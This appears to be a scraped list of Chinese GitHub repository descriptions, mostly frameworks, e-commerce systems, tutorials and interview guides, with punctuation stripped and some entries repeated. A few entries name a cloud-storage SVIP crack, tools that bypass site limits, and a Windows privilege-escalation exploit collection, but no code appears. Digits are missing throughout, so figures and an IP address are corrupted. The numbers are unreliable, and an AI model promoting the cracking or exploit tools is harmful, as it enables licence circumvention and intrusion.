中国国家尊严不容挑衅 如果您在特殊时期 此项目是机器学习 Machine Learning 深度学习 Deep Learning NLP面试中常考到的知识点和代码实现 也是作为一个算法工程师必会的理论基础知识 夜读 通过 bilibili 在线直播的方式分享 Go 相关的技术话题 每天大家在微信 telegram Slack 上及时沟通交流编程技术话题 GitHubDaily 分享内容定期整理与分类 欢迎推荐 自荐项目 让更多人知道你的项目 支持多家云存储的云盘系统机器学习相关教程DataX是阿里云DataWorks数据集成的开源版本 这里是写博客的地方 Halfrost Field 冰霜之地mall学习教程 架构 业务 技术要点全方位解析 mall项目 4 k star 是一套电商系统 使用现阶段主流技术实现 涵盖了等技术 采用Docker容器化部署 chick 是使用 Node js 和 MongoDB 开发的社区系统一个非常适合IT团队的在线API文档 技术文档工具汇总各大互联网公司容易考察的高频leetcode题 1 Chinese Word Vectors 上百种预训练中文词向量 Android开源弹幕引擎 烈焰弹幕使 ~深度学习框架PyTorch 入门与实战 网易云音乐命令行版本 对开发人员有用的定律 理论 原则和模式TeachYourselfCS 的中文翻译高颜值的第三方网易云播放器 支持 Windows macOS Linux spring cloud vue oAuth2 全家桶实战 前后端分离模拟商城 完整的购物流程 后端运营平台 可以实现快速搭建企业级微服务项目 支持微信登录等三方登录 Chinese sticker pack More joy 表情包的博物馆 Github最有毒的仓库 中国表情包大集合 聚欢乐 Lantern官方版本下载 蓝灯 翻墙 代理 科学上网 外网 加速器 梯子 路由一款入门级的人脸 视频 文字检测以及识别的项目 vue2 vue router vuex 入门项目PanDownload的个人维护版本 一个基于Spring Boot MyBatis的种子项目 用于快速构建中小型API RESTful API项目 iOS interview questions iOS面试题集锦 附答案 学习qq群或 Telegram 群交流为互联网IT人打造的中文版awesome go强大 可定制 易扩展的 ViewPager 指示器框架 是的最佳替代品 支持角标 更支持在非ViewPager场景下使用 使用hide show 切换Fragment或使用se Kubernetes中文指南 云原生应用架构实践手册For macOS 百度网盘 破解SVIP 下载速度限制 架构师技术图谱 助你早日成为架构师mall admin web是一个电商后台管理系统的前端项目 基于Vue Element实现 主要包括商品管理 订单管理 会员管理 促销管理 运营管理 内容管理 统计报表 财务管理 权限管理 设置等功能 网易云音乐第三方 编程随想 整理的 太子党关系网络 专门揭露赵国的权贵基于gin vue搭建的后台管理系统框架 集成jwt鉴权 权限管理 动态路由 分页封装 多点登录拦截 资源权限 上传下载 代码生成器 表单生成器 通用工作流等基础功能 五分钟一套CURD前后端代码 目VUE3版本正在重构 欢迎issue和pr 27天成为Java大神一个基于浏览器端 JS 实现的在线代理编程电子书 电子书 编程书籍 包括人工智能 大数据类 并发编程 数据库类 数据挖掘 新面试题 架构设计 算法系列 计算机类 设计模式 软件测试 重构优化 等更多分类ADB Usage Complete ADB 用法大全二维码生成器 支持 gif 动态图片二维码 Vim 从入门到精通阿布量化交易系统 股票 期权 期货 比特币 机器学习 基于python的开源量化交易 量化投资架构一个简洁优雅的hexo主题 Wiki of OI ICPC for everyone 某大型游戏线上攻略 内含炫酷算术魔法 Google 开源项目风格指南 中文版 Git AWS Google 镜像 SS SSR VMESS节点行业研究报告的知识储备库 cim cross IM 适用于开发者的分布式即时通讯系统微信小程序开源项目库汇总每天更新 全网热门 BT Tracker 列表 天用Go动手写 从零实现系列强大的哔哩哔哩增强脚本 下载视频 音乐 封面 弹幕 简化直播间 评论区 首页 自定义顶栏 删除广告 夜间模式 触屏设备支持Evil Huawei 华为作过的恶Android上一个优雅 万能自定义UI 仿iOS 支持垂直 水平方向切换 支持周视图 自定义周起始 性能高效的日历控件 支持热插拔实现的UI定制 支持标记 自定义颜色 农历 自定义月视图各种显示模式等 Canvas绘制 速度快 占用内存低 你真的想不到日历居然还可以如此优雅已不再维护科学上网插件的离线安装包储存在这里ThinkPHP Framework 十年匠心的高性能PHP框架 Java 程序员眼中的 Linux 一个支持多选 选原图和视频的图片选择器 同时有预览 裁剪功能 支持hsweb haʊs wɛb 是一个基于spring boot 2 x开发 首个使用全响应式编程的企业级后台管理系统基础项目 学习强国 懒人刷分工具 自动学习wxParse 微信小程序富文本解析自定义组件 支持HTML及markdown解析 newbee mall 项目 新蜂商城 是一套电商系统 包括 newbee mall 商城系统及 newbee mall admin 商城后台管理系统 基于 Spring Boot 2 X 及相关技术栈开发 前台商城系统包含首页门户 商品分类 新品上线 首页轮播 商品推荐 商品搜索 商品展示 购物车 订单结算 订单流程 个人订单管理 会员中心 帮助中心等模块 后台管理系统包含数据面板 轮播图管理 商品管理 订单管理 会员管理 分类管理 设置等模块 最全的前端资源汇总仓库 包括前端学习 开发资源 求职面试等 中文翻译手写实现李航 统计学习方法 书中全部算法 Python 抖音机器人 论如何在抖音上找到漂亮小姐姐? ️A static blog writing client 一个静态博客写作客户端 超级速查表 编程语言 框架和开发工具的速查表 单个文件包含一切你需要知道的东西 迁移学习前端低代码框架 通过 JSON 配置就能生成各种页面 技术面试最后反问面试官的话Machine Learning Yearning 中文版 机器学习训练秘籍 Andrew Ng 著越来越多的网站具有反爬虫特性 有的用图片隐藏关键数据 有的使用反人类的验证码 建立反反爬虫的代码仓库 通过与不同特性的网站做斗争 无恶意 提高技术 欢迎提交难以采集的网站 因工作原因 项目暂停 本项目收藏这些年来看过或者听过的一些不错的常用的上千本书籍 没准你想找的书就在这里呢 包含了互联网行业大多数书籍和面试经验题目等等 有人工智能系列 常用深度学习框架TensorFlow pytorch keras NLP 机器学习 深度学习等等 大数据系列 Spark Hadoop Scala kafka等 程序员必修系列 C C java 数据结构 linux 设计模式 数据库等等 人人影视bot 完全对接人人影视全部无删减资源Spring Cloud基础教程 持续连载更新中一个用于在 macOS 上平滑你的鼠标滚动效果或单独设置滚动方向的小工具 让你的滚轮爽如触控板阿里妈妈前端团队出品的开源接口管理工具RAP第二代超轻量级中文ocr 支持竖排文字识别 支持ncnn mnn tnn推理总模型仅4 7M 微信全平台 SDK Senparc Weixin for C 支持 NET Framework 及 NET Core NET 6 已支持微信公众号 小程序 小游戏 企业号 企业微信 开放平台 微信支付 JSSDK 微信周边等全平台 WeChat SDK for C 中文独立博客列表高效率 QQ 机器人支持库支持定制任何播放器SDK和控制层 OpenPower工作组收集汇总的医院开放数据Xray 基于 Nginx 的 VLESS XTLS 一键安装脚本 FlutterDemo合集 今天你fu了吗莫烦Python 中文AI教学中国特色 TabBar 一行代码实现 Lottie 动画TabBar 支持中间带 号的TabBar样式 自带红点角标 支持动态刷新 Flutter豆瓣客户端 Awesome Flutter Project 全网最1 %还原豆瓣客户端 首页 书影音 小组 市集及个人中心 一个不拉 img xuvip top douyademo mp4 基于SpringCloud2 1的微服务开发脚手架 整合了等 服务治理方面引入等 让项目开发快速进入业务开发 而不需过多时间花费在架构搭建上 持续更新中基于 Vue2 和 ECharts 封装的图表组件 SSR 去广告ACL规则 SS完整GFWList规则 Clash规则碎片 Telegram频道订阅地址和我一步步部署 kubernetes 集群搜集 整理 维护实用规则 中文自然语言处理相关资料基于SOA架构的分布式电商购物商城 前后端分离 前台商城 全家桶 后台管理系统等What happens when 的中文翻译 原仓库QMUI iOS 致力于提高项目 UI 开发效率的解决方案新型冠状病毒防疫信息收集平台告别枯燥 致力于打造 Python 实用小例子在线制作 sorry 为所欲为 的gifNodejs学习笔记以及经验总结 公众号 程序猿小卡 李宏毅 机器学习 笔记 在线阅读地址 Vue js 源码分析V部落 Vue SpringBoot实现的多用户博客管理平台 Android Signature V2 Scheme签名下的新一代渠道包打包神器Autoscroll Banner 无限循环图片 文字轮播器 多种编程语言实现 LeetCode 剑指 Offer 第 2 版 程序员面试金典 第 6 版 题解一套高质量的微信小程序 UI 组件库飞桨 官方模型库 包含多种学术前沿和工业场景验证的深度学习模型 中文 Python 笔记专门为刚开始刷题的同学准备的算法基地 没有最细只有更细 立志用动画将晦涩难懂的算法说的通俗易懂 版入门实例代码 实战教程 是一个高性能且低损耗的 goroutine 池 CVPR 2 21 论文和开源项目合集有 有 Python进阶 Intermediate Python 中文版 机器人视觉 移动机器人 VS SLAM ORB SLAM2 深度学习目标检测 yolov3 行为检测 opencv PCL 机器学习 无人驾驶后台管理系统解决方案创建在线课程 学术简历或初创网站 Chrome插件开发全攻略 配套完整Demo 欢迎clone体验QUANTAXIS 支持任务调度 分布式部署的 股票 期货 期权 港股 虚拟货币 数据 回测 模拟 交易 可视化 多账户 纯本地量化解决方案微信调试 各种WebView样式调试 手机浏览器的页面真机调试 便捷的远程调试手机页面 抓包工具 支持 HTTPS 无需USB连接设备 rich text 富文本编辑器 汉字拼音 hàn zì pīn yīn面向开发人员梳理的代码安全指南以撸代码的形式学习Python提供同花顺客户端 国金 华泰客户端 雪球的基金 股票自动程序化交易以及自动打新 支持跟踪 joinquant ricequant 模拟交易 和 实盘雪球组合 量化交易组件搜狐视频 sohu tv Redis私有云平台spring boot打造文件文档在线预览项目计算机基础 计算机网络 操作系统 数据库 Git 面试问题全面总结 包含详细的follow up question以及答案 全部采用 问题 追问 答案 的形式 即拿即用 直击互联网大厂面试 可用于模拟面试 面试前复习 短期内快速备战面试 首款微信 macOS 客户端撤回拦截与多开windows kernel exploits Windows平台提权漏洞集合权限管理系统 预览地址 47 1 4 7 138 loginpkuseg多领域中文分词工具一款完善的安全评估工具 支持常见 web 安全问题扫描和自定义 poc 使用之前务必先阅读文档零反射全动态Android插件框架Python入门网络爬虫之精华版分布式配置管理平台 中文 iOS Mac 开发博客列表周志华 机器学习 又称西瓜书是一本较为全面的书籍 书中详细介绍了机器学习领域不同类型的算法 例如 监督学习 无监督学习 半监督学习 强化学习 集成降维 特征选择等 记录了本人在学习过程中的理解思路与扩展知识点 希望对新人阅读西瓜书有所帮助 国内首个Spring Cloud微服务化RBAC的管理平台 核心采用前端采用d2 admin中台框架 记得上边点个star 关注更新Apache ECharts incubating 的微信小程序版本C 资源大全中文版 标准库 Web应用框架 人工智能 数据库 图片处理 机器学习 日志 代码分析等 由 开源前哨 和 CPP开发者 微信公号团队维护更新 stackoverflow上Java相关回答整理翻译 基于Google Flutter的WanAndroid客户端 支持Android和iOS 包括BLoC RxDart 国际化 主题色 启动页 引导页 本代码库是作者小傅哥多年从事一线互联网 Java 开发的学习历程技术汇总 旨在为大家提供一个清晰详细的学习教程 侧重点更倾向编写Java核心内容 如果本仓库能为您提供帮助 请给予支持 关注 点赞 分享 C 资源大全中文版 包括了 构建系统 编译器 数据库 加密 初中高的教程 指南 书籍 库等 NET m3u8 downloader 开源的命令行m3u8 HLS dash下载器 支持普通AES 128 CBC解密 多线程 自定义请求头等 支持简体中文 繁体中文和英文 English Supported 国内低代码平台从业者交流tcc transaction是TCC型事务java实现设计模式 Golang实现 研磨设计模式 读书笔记Vue数据可视化组件库 类似阿里DataV 大屏数据展示 提供SVG的边框及装饰 图表 水位图 飞线图等组件 简单易用 长期更新 React版已发布 自己动手做聊天机器人教程 RecyclerView侧滑菜单 Item拖拽 滑动删除Item 自动加载更多 HeaderView FooterView Item分组黏贴 腾讯物联网终端操作系统一个小巧 轻量的浏览器内核 用来取代wke和libcef包含美颜等4 余种实时滤镜相机 可拍照 录像 图片修改springboot 框架与其它组件结合如等用深度学习对对联 技术面试必备基础知识 Leetcode 计算机操作系统 计算机网络 系统设计 Java学习 面试指南 一份涵盖大部分 Java 程序员所需要掌握的核心知识 准备 Java 面试 首选 JavaGuide 用动画的形式呈现解LeetCode题目的思路 互联网 Java 工程师进阶知识完全扫盲 涵盖高并发 分布式 高可用 微服务 海量数据处理等领域知识mall项目是一套电商系统 包括前台商城系统及后台管理系统 基于SpringBoot MyBatis实现 采用Docker容器化部署 前台商城系统包含首页门户 商品推荐 商品搜索 商品展示 购物车 订单流程 会员中心 客户服务 帮助中心等模块 后台管理系统包含商品管理 订单管理 会员管理 促销管理 运营管理 内容管理 统计报表 财务管理 权限管理 设置等模块 GitHub中文排行榜 帮助你发现高分优秀中文项目 更高效地吸收国人的优秀经验成果 榜单每周更新一次 敬请关注 算法面试 算法知识 针对小白的算法训练 还包括 1 阿里 字节 滴滴 百篇大厂面经汇总 2 千本开源电子书 3 百张思维导图 右侧来个 star 吧 English version supported 诊断利器Arthas教程 技术栈示例代码 快速简单上手教程 http下载工具 基于http代理 支持多连接分块下载阿里云计算平台团队出品 为监控而生的数据库连接池 企业级低代码平台 前后端分离架构强大的代码生成器让前后端代码一键生成 无需写任何代码 引领新的开发模式OnlineCoding 代码生成 手工MERGE 帮助Java项目解决7 %重复工作 让开发更关注业务 既能快速提高效率 帮助公司节省成本 同时又不失灵活性 下拉刷新 上拉加载 二级刷新 淘宝二楼智能下拉刷新框架 支持越界回弹 越界拖动 具有极强的扩展性 集成了几十种炫酷的Header和 Footer 该项目已成功集成 actuator 监控 admin 可视化监控 logback 日志 aopLog 通过AOP记录web请求日志 统一异常处理 json级别和页面级别 freemarker 模板引擎 thymeleaf 模板引擎 Beetl 模板引擎 Enjoy 模板引擎 JdbcTemplate 通用JDBC操作数据库 JPA 强大的ORM框架 mybatis 强大的ORM框架 通用Mapper 快速操作Mybatis PageHelper 通用的Mybatis分页插件 mybatis plus 快速操作Mybatis BeetlSQL 强大的ORM框架 u 微人事是一个前后端分离的人力资源管理系统 项目采用SpringBoot Vue开发 秒杀系统设计与实现 互联网工程师进阶与分析 To Be Top Javaer Java工程师成神之路循序渐进 学习博客Spring系列源码 mrbird cc快速 简单避免OOM的java处理Excel工具阿里巴巴 MySQL binlog 增量订阅 消费组件 一款优秀的开源博客发布应用 分布式任务调度平台XXL JOB 一款面向泛前端产品研发全生命周期的效率平台 面向云原生微服务的高可用流控防护组件 视频播放器支持弹幕 外挂字幕 支持滤镜 水印 gif截图 片头广告 中间广告 多个同时播放 支持基本的拖动 声音 亮度调节 支持边播边缓存 支持视频自带rotation的旋转 9 27 之类 重力旋转与手动旋转的同步支持 支持列表播放 列表全屏动画 视频加载速度 列表小窗口支持拖动 动画效果 调整比例 多分辨率切换 支持切换播放器 进度条小窗口预览 列表切换详情页面无缝播放 rtsp concat mpeg 又一个小商城 litemall Spring Boot后端 Vue管理员前端 微信小程序用户前端 Vue用户移动端基于Spring SpringMVC Mybatis分布式敏捷开发系统架构 提供整套公共微服务服务模块 集中权限管理 单点登录 内容管理 支付中心 用户管理 支持第三方登录 微信平台 存储系统 配置中心 日志分析 任务和通知等 支持服务治理 监控和追踪 努力为中小型企业打造全方位J2EE企业级开发解决方案 项目基于的前后端分离的后台管理系统 项目采用分模块开发方式 权限控制采用 RBAC 支持数据字典与数据权限管理 支持一键生成前后端代码 支持动态路由 史上最简单的Spring Cloud教程源码 CAT 作为服务端项目基础组件 提供了 Java C C Node js Python Go 等多语言客户端 已经在美团点评的基础架构中间件框架 MVC框架 RPC框架 数据库框架 缓存框架等 消息队列 配置系统等 深度集成 为美团点评各业务线提供系统丰富的性能指标 健康状况 实时告警等 spring boot 实践学习案例 是 spring boot 初学者及核心技术巩固的最佳实践 另外写博客 用 OpenWrite Spring Boot基础教程 Spring Boot 2 x版本连载中 帮助 Android App 进行组件化改造的路由框架 提高 Android UI 开发效率的 UI 库时间选择器 省市区三级联动 Luban 鲁班可能是最接近微信朋友圈的图片压缩算法 Gitee 最有价值开源项目 小而全而美的第三方登录开源组件 目前已支持Github Gitee 微博 钉钉 百度 Coding 腾讯云开发者平台 OSChina 支付宝 QQ 微信 淘宝 Google Facebook 抖音 领英 小米 微软 今日头条人人 华为 企业微信 酷家乐 Gitlab 美团 饿了么 推特 飞书 京东 阿里云 喜马拉雅 Amazon Slack和 Line 等第三方平台的授权登录 Login so easy 今日头条屏幕适配方案终极版 一个极低成本的 Android 屏幕适配方案 Banner 2 来了 Android广告图片轮播控件 内部基于ViewPager2实现 Indicator和UI都可以自定义 零代码 热更新 自动化 ORM 库 后端接口和文档零代码 前端 客户端 定制返回 JSON 的数据和结构一个涵盖六个专栏分布式消息队列 分布式事务的仓库 希望胖友小手一抖 右上角来个 Star 感恩 1 24Mybatis通用分页插件OkGo 3 震撼来袭 该库是基于 协议 封装了 OkHttp 的网络请求框架 比 Retrofit 更简单易用 支持 RxJava RxJava2 支持自定义缓存 支持批量断点下载管理和批量上传管理功能含 Flink 入门 概念 原理 实战 性能调优 源码解析等内容 涉及等内容的学习案例 还有 Flink 落地应用的大型项目案例 PVUV 日志存储 百亿数据实时去重 监控告警 分享 欢迎大家支持我的专栏 大数据实时计算引擎 Flink 实战与性能优化 安卓平台上的JavaScript自动化工具 ️一个整合了大量主流开源项目高度可配置化的 Android MVP 快速集成框架 Spring源码阅读大数据入门指南 android 4 4以上沉浸式状态栏和沉浸式导航栏管理 适配横竖屏切换 刘海屏 软键盘弹出等问题 可以修改状态栏字体颜色和导航栏图标颜色 以及不可修改字体颜色手机的适配 适用于一句代码轻松实现 以及对bar的其他设置 详见README 简书请参考 www jianshu com p 2a884e211a62业内为数不多致力于极致体验的超强全自研跨平台 windows android iOS 流媒体内核 通过模块化自由组合 支持实时RTMP推流 RTSP推流 RTMP播放器 RTSP播放器 录像 多路流媒体转发 音视频导播 动态视频合成 音频混音 直播互动 内置轻量级RTSP服务等 比快更快 业界真正靠谱的超低延迟直播SDK 1秒内 低延迟模式下2 4 ms DataX是阿里云DataWorks数据集成的开源版本 mall学习教程 架构 业务 技术要点全方位解析 mall项目 4 k star 是一套电商系统 使用现阶段主流技术实现 涵盖了等技术 采用Docker容器化部署 Android开源弹幕引擎 烈焰弹幕使 ~spring cloud vue oAuth2 全家桶实战 前后端分离模拟商城 完整的购物流程 后端运营平台 可以实现快速搭建企业级微服务项目 支持微信登录等三方登录 一个基于Spring Boot MyBatis的种子项目 用于快速构建中小型API RESTful API项目 强大 可定制 易扩展的 ViewPager 指示器框架 是的最佳替代品 支持角标 更支持在非ViewPager场景下使用 使用hide show 切换Fragment或使用se 27天成为Java大神安卓学习笔记 cim cross IM 适用于开发者的分布式即时通讯系统Android上一个优雅 万能自定义UI 仿iOS 支持垂直 水平方向切换 支持周视图 自定义周起始 性能高效的日历控件 支持热插拔实现的UI定制 支持标记 自定义颜色 农历 自定义月视图各种显示模式等 Canvas绘制 速度快 占用内存低 你真的想不到日历居然还可以如此优雅hsweb haʊs wɛb 是一个基于spring boot 2 x开发 首个使用全响应式编程的企业级后台管理系统基础项目 newbee mall 项目 新蜂商城 是一套电商系统 包括 newbee mall 商城系统及 newbee mall admin 商城后台管理系统 基于 Spring Boot 2 X 及相关技术栈开发 前台商城系统包含首页门户 商品分类 新品上线 首页轮播 商品推荐 商品搜索 商品展示 购物车 订单结算 订单流程 个人订单管理 会员中心 帮助中心等模块 后台管理系统包含数据面板 轮播图管理 商品管理 订单管理 会员管理 分类管理 设置等模块 mall swarm是一套微服务商城系统 采用了等核心技术 同时提供了基于Vue的管理后台方便快速搭建系统 mall swarm在电商业务的基础集成了注册中心 配置中心 监控中心 网关等系统功能 文档齐全 附带全套Spring Cloud教程 阅读是一款可以自定义来源阅读网络内容的工具 为广大网络文学爱好者提供一种方便 快捷舒适的试读体验 Spring Cloud基础教程 持续连载更新中阿里巴巴分布式数据库同步系统 解决中美异地机房 基于谷歌最新AAC架构 MVVM设计模式的一套快速开发库 整合OkRxJava Retrofit Glide等主流模块 满足日常开发需求 使用该框架可以快速开发一个高质量 易维护的Android应用 基于SpringCloud2 1的微服务开发脚手架 整合了等 服务治理方面引入等 让项目开发快速进入业务开发 而不需过多时间花费在架构搭建上 持续更新中基于SOA架构的分布式电商购物商城 前后端分离 前台商城 全家桶 后台管理系统等是 难得一见 的 Jetpack MVVM 最佳实践 在 以简驭繁 的代码中 对 视图控制器 乃至 标准化开发模式 形成正确 深入的理解 V部落 Vue SpringBoot实现的多用户博客管理平台 Android Signature V2 Scheme签名下的新一代渠道包打包神器即时通讯 IM 系统多种编程语言实现 LeetCode 剑指 Offer 第 2 版 程序员面试金典 第 6 版 题解专门为刚开始刷题的同学准备的算法基地 没有最细只有更细 立志用动画将晦涩难懂的算法说的通俗易懂 ansj分词 ict的真正java实现 分词效果速度都超过开源版的ict 中文分词 人名识别 词性标注 用户自定义词典 book 任阅 网络小说阅读器 3D翻页效果 txt pdf epub书籍阅读 Wifi传书 LeetCode刷题记录与面试整理mybatis generator界面工具 让你生成代码更简单更快捷Spring Cloud 学习案例 服务发现 服务治理 链路追踪 服务监控等 XPopup2 版本重磅来袭 2倍以上性能提升 带来可观的动画性能优化和交互细节的提升 功能强大 交互优雅 动画丝滑的通用弹窗 可以替代等组件 自带十几种效果良好的动画 支持完全的UI和动画自定义搜狐视频 sohu tv Redis私有云平台spring boot打造文件文档在线预览项目权限管理系统 预览地址 47 1 4 7 138 login零反射全动态Android插件框架分布式配置管理平台 通用 IM 聊天 UI 组件 已经同时支持 Android iOS RN 手把手教你整合最优雅SSM框架 SpringMVC Spring MyBatis换肤框架 极低的学习成本 极好的用户体验 一行 代码就可以实现换肤 你值得拥有 JVM 底层原理最全知识总结 国内首个Spring Cloud微服务化RBAC的管理平台 核心采用前端采用d2 admin中台框架 记得上边点个star 关注更新tcc transaction是TCC型事务java实现 RecyclerView侧滑菜单 Item拖拽 滑动删除Item 自动加载更多 HeaderView FooterView Item分组黏贴 包含美颜等4 余种实时滤镜相机 可拍照 录像 图片修改springboot 框架与其它组件结合如等安卓选择器类库 包括日期及时间选择器 可用于出生日期 营业时间等 单项选择器 可用于性别 民族 职业 学历 星座等 二三级联动选择器 可用于车牌号 基金定投日期等 城市地址选择器 分省级 地市级及区县级 数字选择器 可用于年龄 身高 体重 温度等 日历选日期择器 可用于酒店及机票预定日期 颜色选择器 文件及目录选择器等 Java工程师面试复习指南 本仓库涵盖大部分Java程序员所需要掌握的核心知识 整合了互联网上的很多优质Java技术文章 力求打造为最完整最实用的Java开发者学习指南 如果对你有帮助 给个star告诉我吧 谢谢 Android MVP 快速开发框架 做国内 示例最全面 注释最详细 使用最简单 代码最严谨 的 Android 开源 UI 框架几行代码快速集成二维码扫描功能MeterSphere 是一站式开源持续测试平台 涵盖测试跟踪 接口测试 性能测试 团队协作等功能 全面兼容 JMeter Postman Swagger 等开源 主流标准 记录各种学习笔记 算法 Java 数据库 并发 下一代Android打包工具 1 个渠道包只需要1 秒钟芋道 mall 商城 基于微服务的思想 构建在 B2C 电商场景下的项目实战 核心技术栈 是 Spring Boot Dubbo 未来 会重构成 Spring Cloud Alibaba Android 万能的等 支持多种Item类型的情况 lanproxy是一个将局域网个人电脑 服务器代理到公网的内网穿透工具 支持tcp流量转发 可支持任何tcp上层协议 访问内网网站 本地支付接口调试 ssh访问 远程桌面 目前市面上提供类似服务的有花生壳 TeamView GoToMyCloud等等 但要使用第三方的公网服务器就必须为第三方付费 并且这些服务都有各种各样的限制 此外 由于数据包会流经第三方 因此对数据安全也是一大隐患 技术交流QQ群 1 6742433 更优雅的驾车体验下载可以很简单 ️ 云阅 一款基于网易云音乐UI 使用玩架构开发的符合Google Material Design的Android客户端开源的 Material Design 豆瓣客户端一款针对系统PopupWindow优化的Popup库 功能强大 支持背景模糊 使用简单 你会爱上他的 PLDroidPlayer 是七牛推出的一款免费的适用于 Android 平台的播放器 SDK 采用全自研的跨平台播放内核 拥有丰富的功能和优异的性能 可高度定制化和二次开发 该项目已停止维护 9 Porn Android 客户端 突破游客每天观看1 次视频的限制 还可以下载视频 ️蓝绿 灰度 路由 限流 熔断 降级 隔离 追踪 流量染色 故障转移一本关于排序算法的 GitBook 在线书籍 十大经典排序算法 多语言实现 多种下拉刷新效果 上拉加载更多 可配置自定义头部广告位完全仿微信的图片选择 并且提供了多种图片加载接口 选择图片后可以旋转 可以裁剪成矩形或圆形 可以配置各种其他的参数SoloPi 自动化测试工具龙果支付系统 roncoo pay 是国内首款开源的互联网支付系统 拥有独立的账户体系 用户体系 支付接入体系 支付交易体系 对账清结算体系 目标是打造一款集成主流支付方式且轻量易用的支付收款系统 满足互联网业务系统打通支付通道实现支付收款和业务资金管理等功能 键盘面板冲突 布局闪动处理方案 咕泡学院实战项目 基于SpringBoot Dubbo构建的电商平台 微服务架构 商城 电商 微服务 高并发 kafka Elasticsearch停车场系统源码 停车场小程序 智能停车 Parking system 功能介绍 ①兼容市面上主流的多家相机 理论上兼容所有硬件 可灵活扩展 ②相机识别后数据自动上传到云端并记录 校验相机唯一id和硬件序列号 防止非法数据录入 ③用户手机查询停车记录详情可自主缴费 支持微信 支付宝 银行接口支付 支持每个停车场指定不同的商户进行收款 支付后出场在免费时间内会自动抬杆 ④支持app上查询附近停车场 导航 可用车位数 停车场费用 优惠券 评分 评论等 可预约车位 ⑤断电断网支持岗亭人员使用app可接管硬件进行停车记录的录入 技术架构 后端开发语言java 框架oauth2 spring 成长路线 但学到不仅仅是Java 业界首个支持渐进式组件化改造的Android组件化开源框架 支持跨进程调用SpringBoot2 从入门到实战 旨在打造在线最佳的 Java 学习笔记 含博客讲解和源码实例 包括 Java SE 和 Java WebJava诊断工具年薪百万互联网架构师课程文档及源码 公开部分 AndroidHttpCapture网络诊断工具 是一款Android手机抓包软件 主要功能包括 手机端抓包 PING DNS TraceRoute诊断 抓包HAR数据上传分享 你也可以看成是Android版的 Fiddler o 这可能是史上功能最全的Java权限认证框架 目前已集成 登录认证 权限认证 分布式Session会话 微服务网关鉴权 单点登录 OAuth2 踢人下线 Redis集成 前后台分离 记住我模式 模拟他人账号 临时身份切换 账号封禁 多账号认证体系 注解式鉴权 路由拦截式鉴权 花式token生成 自动续签 同端互斥登录 会话治理 密码加密 jwt集成 Spring集成 WebFlux集成 Android平台下的富文本解析器 支持Html和Markdown智能图片裁剪框架 自动识别边框 手动调节选区 使用透视变换裁剪并矫正选区 适用于身份证 名片 文档等照片的裁剪 俗名 可垂直跑 可水平跑的跑马灯 学名 可垂直翻 可水平翻的翻页公告 小马哥技术周报 Android Video Player 安卓视频播放器 封装模仿抖音并实现预加载 列表播放 悬浮播放 广告播放 弹幕 重学Java设计模式 是一本互联网真实案例实践书籍 以落地解决方案为核心 从实际业务中抽离出 交易 营销 秒杀 中间件 源码等22个真实场景 来学习设计模式的运用 欢迎关注小傅哥 微信 fustack 公众号 bugstack虫洞栈 博客 bugstack cnmybatis源码中文注释一款开源的GIF在线分享App 乐趣就要和世界分享 MPush开源实时消息推送系统在线云盘 网盘 OneDrive 云存储 私有云 对象存储 h5ai基于Spring Boot 2 x的一站式前后端分离快速开发平台XBoot 微信小程序 Uniapp 前端 Vue iView Admin 后端分布式限流 同步锁 验证码 SnowFlake雪花算法ID 动态权限 数据权限 工作流 代码生成 定时任务 社交账号 短信登录 单点登录 OAuth2开放平台 客服机器人 数据大屏 暗黑模式Guns基于SpringBoot 2 致力于做更简洁的后台管理系统 完美整合项目代码简洁 注释丰富 上手容易 同时Guns包含许多基础模块 用户管理 角色管理 部门管理 字典管理等1 个模块 可以直接作为一个后台管理系统的脚手架 Android 版本更新一个简洁而优雅的Android原生UI框架 解放你的双手 一套完整有效的android组件化方案 支持组件的组件完全隔离 单独调试 集成调试 组件交互 UI跳转 动态加载卸载等功能适用于Java和Android的快速 低内存占用的汉字转拼音库 Codes of my MOOC Course <我在慕课网上的课程 算法与数据结构 示例代码 包括C 和Java版本 课程的更多更新内容及辅助练习也将逐步添加进这个代码仓 Hope Boot 一款现代化的脚手架项目一个简单漂亮的SSM Spring SpringMVC Mybatis 博客系统根据Gson库使用的要求 将JSONObject格式的String 解析成实体B站 哔哩哔哩 Bilibili 自动签到投币工具 每天轻松获取65经验值 支持每日自动投币 银瓜子兑换硬币 领取大会员福利 大会员月底给自己充电等功能 呐 赶快和我一起成为Lv6吧 IJPay 让支付触手可及 封装了微信支付 QQ支付 支付宝支付 京东支付 银联支付 PayPal 支付等常用的支付方式以及各种常用的接口 不依赖任何第三方 mvc 框架 仅仅作为工具使用简单快速完成支付模块的开发 可轻松嵌入到任何系统里 右上角点下小星星 High quality pure Weex demo 网易严选 App 感受 Weex 开发Android 快速实现新手引导层的库 通过简洁链式调用 一行代码实现引导层的显示通过标签直接生成shape 无需再写shape xml 本库是一款基于RxJava2 Retrofit2实现简单易用的网络请求框架 结合android平台特性的网络封装库 采用api链式调用一点到底 集成cookie管理 多种缓存模式 极简https配置 上传下载进度显示 请求错误自动重试 请求携带token 时间戳 签名sign动态配置 自动登录成功后请求重发功能 3种层次的参数设置默认全局局部 默认标准ApiResult同时可以支持自定义的数据结构 已经能满足现在的大部分网络请求 Android BLE蓝牙通信库 基于Flink实现的商品实时推荐系统 flink统计商品热度 放入redis缓存 分析日志信息 将画像标签和实时记录放入Hbase 在用户发起推荐请求后 根据用户画像重排序热度榜 并结合协同过滤和标签两个推荐模块为新生成的榜单的每一个产品添加关联产品 最后返回新的用户列表 播放器基础库 专注于播放视图组件的高复用性和组件间的低耦合 轻松处理复杂业务 图片选择库 单选 多选 拍照 裁剪 压缩 自定义 包括视频选择和录制 DataX集成可视化页面 选择数据源即可一键生成数据同步任务 支持等数据源 批量创建RDBMS数据同步任务 集成开源调度系统 支持分布式 增量同步数据 实时查看运行日志 监控执行器资源 KILL运行进程 数据源信息加密等 Deprecated android 自定义日历控件 支持左右无限滑动 周月切换 标记日期显示 自定义显示效果跳转到指定日期一个通过动态加载本地皮肤包进行换肤的皮肤框架这是RedSpider社区成员原创与维护的Java多线程系列文章 一站式Apache Kafka集群指标监控与运维管控平台快速开发工具类收集 史上最全的开发工具类 欢迎Follow Fork Star后端技术总结 包括Java基础 JVM 数据库 mysql redis 计算机网络 算法 数据结构 操作系统 设计模式 系统设计 框架原理 最佳阅读地址Android源码设计模式分析项目可能是最好的支付SDK 停止维护 组件化综合案例 包含微信新闻 头条视频 美女图片 百度音乐 干活集中营 玩Android 豆瓣读书电影 知乎日报等等模块 架构模式 组件化阿里VLayout 腾讯X5 腾讯bugly 融合开发中需要的各种小案例 开源OA系统 码云GVP Java开源oa 企业OA办公平台 企业OA 协同办公OA 流程平台OA O2OA 